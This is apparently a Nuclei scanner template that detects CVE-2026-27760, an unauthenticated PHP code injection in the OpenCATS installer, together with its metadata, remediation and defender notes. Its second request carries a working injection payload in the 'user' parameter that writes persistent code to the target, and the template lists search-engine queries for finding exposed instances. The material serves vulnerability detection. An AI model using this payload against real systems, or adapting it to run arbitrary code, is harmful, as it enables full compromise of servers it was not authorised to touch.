# Nuclei detection template for CVE-2026-27760 (OpenCATS installer code injection).
# Structure: metadata under `info`, a three-step `flow`, and the HTTP requests under
# `http`. Steps 1 and 2 are `internal` (their matchers gate the flow but do not
# report); only step 3 produces the finding.
id: CVE-2026-27760

info:
  name: OpenCATS - Command Injection
  author: theamanrawat
  severity: high
  description: |
    OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise.
  remediation: |
    Update to the version after commit 3002a29 or latest available version.
  reference:
    - https://chocapikk.com/posts/2026/opencats-installer-rce/
    - https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6
    - https://github.com/opencats/OpenCATS
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27760
  classification:
    # AC:H reflects the precondition below: the installation wizard must still be
    # incomplete/unlocked for the endpoint to be reachable.
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2026-27760
    epss-score: 0.22189
    epss-percentile: 0.97382
    # CWE-94 is code injection (PHP statements), which is more precise than the
    # "Command Injection" wording in `name`.
    cwe-id: CWE-94
  metadata:
    verified: true
    # Must match the number of requests under `http` (three below).
    max-request: 3
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"opencats"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2026,opencats,rce,vkev

# Sequential flow: each step runs only if the previous step's matchers passed.
flow: http(1) && http(2) && http(3)

http:
  # Step 1 (precheck): the installer endpoint is still reachable. A body without
  # 'installLocked' and with 'setActiveStep' is treated as an unfinished wizard,
  # which is the precondition for this issue. Completing or locking the installer
  # removes this precondition (see `remediation`).
  - raw:
      - |
        GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "!contains(body, 'installLocked')"
          - "contains(body, 'setActiveStep')"
          - "status_code == 200"
        condition: and
        internal: true

  # Step 2: submit a random marker through the `user` parameter. Only a 200 is
  # required here; the marker is checked in step 3. Note that this is not a
  # read-only check: step 3 expects the marker on a different page, which
  # indicates the submitted statement persists on the target (presumably in a
  # file index.php loads — confirm against the referenced writeup) and will need
  # cleanup after a positive result.
  # Defender note: a POST to /ajax.php?f=install:ui&a=databaseConnectivity whose
  # `user` value contains quote/parenthesis/semicolon sequences is a strong
  # indicator in web logs.
  - raw:
      - |
        POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=cats');echo+'{{randstr}}'.md5('{{randstr}}');//

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  # Step 3 (confirmation): the marker and its md5 appear in /index.php, proving the
  # injected statement was executed. Using randstr + md5(randstr) avoids matching
  # on a reflected echo of the input alone.
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}' + md5('{{randstr}}'))"
          - "status_code == 200"
        condition: and
# Template signature. It covers the template bytes above, so any edit (including
# whitespace changes) invalidates it; re-sign the template after modifying it.
# digest: 4a0a004730450221009fdecfec069b5a87a51fb01c38546d0d9356227339f02ed45a0766e56273151902202c37edbdf754fbec694f3fcdeb14c09c750bde39b2958972a352c25c24f08a96:922c64590222798bb761d5b6d8e72950